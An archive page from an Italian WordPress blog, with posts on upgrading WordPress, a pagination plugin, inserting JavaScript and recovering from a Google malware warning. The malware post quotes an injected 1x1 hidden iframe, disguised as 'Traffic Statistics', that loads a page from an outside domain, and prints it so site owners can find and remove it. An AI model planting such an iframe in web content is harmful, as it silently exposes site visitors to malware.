Guida a WordPress un anno dopo

Pubblicato il Novembre 25, 2008 | Archiviato in Guide, Wordpress

E’ trascorso un anno da quando ho pubblicato l’ebook gratuito sulla guida a WordPress per principianti e vale la pena fare un breve punto della situazione.

La guida è stata scaricata 3.752 volte, tutti i giorni eccetto il 25 febbraio (dov’eravate il 25 febbraio? :) ).

La pagina ha ricevuto parecchi backlink, e io parecchie soddisfazioni (c’è gente che mi ha persino telefonato…).

E’ però giunto il momento di aggiornare la guida, poiché si basa su una vecchia versione di WordPress e con la 2.6 il pannello di controllo è totalmente cambiato. Cercherò quindi di riprendere il testo e modificare quei capitoli che necessitano di una rinfrescata e spero di poterlo fare presto, entro la fine dell’anno.

Aggiornare WordPress alla versione 2.6.3

Pubblicato il Ottobre 27, 2008 | Archiviato in Wordpress

Oggi sono stati hackerati due blog (e chissà quanti altri) realizzati con le versioni di WordPress 2.6 e 2.6.2.

Ho quindi aggiornato alla versione 2.6.3, da poco uscita.

Ho scritto un articolo su come aggiornare WP, ma alcune cose sono cambiate e vale la pena dare alcune istruzioni per chi non è pratico.

  • Scaricate l’ultima versione di WP.
  • Dal pannello di controllo di PhPMyAdmin esportate il database (è solo una questione di sicurezza).
  • Dal pannello di WP disattivate tutti i plugin.
  • Entrate quindi nel server e cancellate tutti i file d’installazione, eccetto il file wp-config.php e la cartella wp-content.
  • Inviate quindi nel server tutti i file della nuova versione, eccetto il file wp-config.php e la cartella wp-content.
  • Aprite nuovamente il blog. Vi sarà chiesto di aggiornare il database e, una volta aggiornato, di effettuare di nuovo il login.
  • Se provenite da una vecchia versione di WP, come la 2.3, dovrete aprire la cartella wp-content e trasferire la cartella languages (che ovviamente troverete all’interno della cartella wp-content della nuova verisone). In questo modo avrete la piattaforma in italiano.

Ed ora non ci resta che attendere l’uscita della versione 2.7.

Numerare le pagine del blog

Pubblicato il Marzo 13, 2008 | Archiviato in Wordpress

Chiunque possieda (o legga) un blog è ormai abituato a vedere a fondo pagina un piccolo menu di navigazione, del tipo: “Articoli successivi – Articoli precedenti”. Può cambiare qualcosa, ma la sostanza è la stessa: un link per tornare indietro ed uno per andare avanti, rendendo lunga la navigazione all’utente che, oltrettuto, ignora quale sia il numero di pagine totale del blog. Inoltre i link a tutte (o quasi) le pagine che contengono gli utlimi articoli saranno presenti in home.

Ci viene in aiuto un semplice plugin, chiamato Page-Navi, ossia page navigation, che farà apparire un menu numerico a fondo pagina:

menu di paginazione

Vediamo i semplici passi per installare il menu.

  • Scaricate il plugin.
  • Decompattate il file .zip.
  • Caricate il plugin nella cartella wp-content/plugin
  • Attivate il plugin dal pannello di controllo, alla voce Plugin/WP-PageNavi.

Attivazione del menu di paginazione

Andate su Aspetto/Editor temi e cliccate sul file index.php. Sostituite quindi la riga <?php posts_nav_link(' &#8212; ', __('&laquo; Articoli precedenti'), __('Articoli successivi &raquo;')); ?> con la riga <?php if(function_exists('wp_pagenavi')) { wp_pagenavi(); } ?>

Personalizzazione del plugin

Dal menu Opzioni scegliete PageNavi. Potete innanzitutto tradurre il primo campo che trovate: Page %CURRENT_PAGE% of %TOTAL_PAGES% con Pagina %CURRENT_PAGE% di %TOTAL_PAGES%, così come il quarto e il quinto campo, dove appaiono First e Last.

Sotto, in Page Navigation Options, scegliete il numero massimo di pagine da mostrare. Non sono necessari ulteriori passi.

Se volete poi personalizzare l’aspetto dei link delle pagine, modificate il foglio di stile del plugin, che trovate tramite questo percorso: /wp-content/plugins/pagenavi/pagenavi-css.css.

Buona navigazione.

Malware su WordPress

Pubblicato il Febbraio 22, 2008 | Archiviato in Wordpress

Cercando, tramite il campo di ricerca di Google, la posizione e l’indicizzazione di due miei blog, ho scoperto una triste sorpresa. Google aveva inserito sotto al title la seguente scritta: Questo sito potrebbe arrecare danni al tuo computer.

Inutile dire il danno che si ha con una frase del genere nelle serp… Le visite di uno dei due blog (l’altro è in costruzione) sono, ovviamente, diminuite drasticamente.

Cliccando su quella scritta si viene reindirizzati ad una delle pagine della Guida di Google, che spiega che i siti che presentano quella scritta possono contenere dei malware, dei file dannosi per il computer.

Inizialmente, preso dal panico, ho controllato tutte le cartelle nel server, per scovare eventuali file sospetti, ma non ho trovato nulla.

Ho richiesto un controllo a Google, seguendo il link a fondo di quella pagina, che diceva appunto: Se sei l’amministratore di un sito identificato dal nostro messaggio di avviso, consulta le istruzioni disponibili nel nostro Centro assistenza webmaster.

Da lì sono andato sulla pagina degli Strumenti per i webmaster di Google. In questa pagina è possibile inserire i propri siti ed avere così a disposizione una serie di strumenti, come la diagnostica, le statistiche, ecc. Sull’Introduzione così ho letto: Questo sito potrebbe diffondere badware, come stabilito dalle linee guida di StopBadware.org per i siti web. Chi effettua ricerche su Google visualizzerà una pagina di avviso quando tenterà di accedere a queste pagine del sito contrassegnate come contenenti badware.
Ho quindi cliccato su Richiedi un controllo. Ma niente, Google continuava va trovare quel file dannoso…

E’ successa nel frattempo la stessa cosa su Casa Spam, il blog contro lo spam che gestiamo io e Pieru. Ho quindi avvisato il mio amico che ha pensato bene, a differenza di me…, di controllare il codice sorgente della home page, trovando questo codice sospetto:

<!-- Traffic Statistics --> <iframe width="1" height="1" frameborder="0" src="http://www.wp-stats-php.info/iframe/wp-stats.php"></iframe> <!-- End Traffic Statistics --> all’interno di un post…

Se a voi è successa o succederà la stessa cosa, controllate il codice sorgente delle pagine incriminate. Google vi segnala un elenco, anche via email, delle pagine che contengono quel codice. Essendo un blog, quel codice non solo era presente sulla pagina dell’articolo, ma anche sulla home, su quella degli archivi e su quella della categoria di riferimento.

E’ bastato aprire il post e cancellare quel codice. Quindi abbiamo richiesto un controllo a Google, che visionerà il sito, lo troverà pulito e toglierà quella scritta dalle serp.

Resta da appurare, ora, come l’hacker di turno abbia potuto inserire quel codice nel post…

Inserire un javascript in un post

Pubblicato il Ottobre 21, 2007 | Archiviato in Wordpress

In questo articolo spiegherò come poter inserire un codice javascript all’interno del post o di una pagina di blog. Mi occorreva, per un sito, inserire i codici Tradedoubler nelle pagine ed ho avuto parecchie difficoltà. Forse dipendeva dal tipo di javascript, nel mio caso era un motore di ricerca per voli economici. Ho trovato un paio di plugin, ma non funzionavano. Poi ho cercato con Google English ed ho finalmente trovato il plugin giusto.

Ecco le semplici istruzioni:

  1. Scaricate il plugin Inline Javascript.
  2. Dezippatelo.
  3. Caricatelo nella solita cartella wp-content/plugin.
  4. Attivatelo da pannello di controllo.
  5. Aprite il post o la pagina in cui visualizzare il javascript ed inserite il codice javascript all’interno del tag [inline].

Un esempio di come sarà visualizzato il codice:

[inline] <script type="text/javascript">document.write("hello world!");</script> [/inline]

keep looking »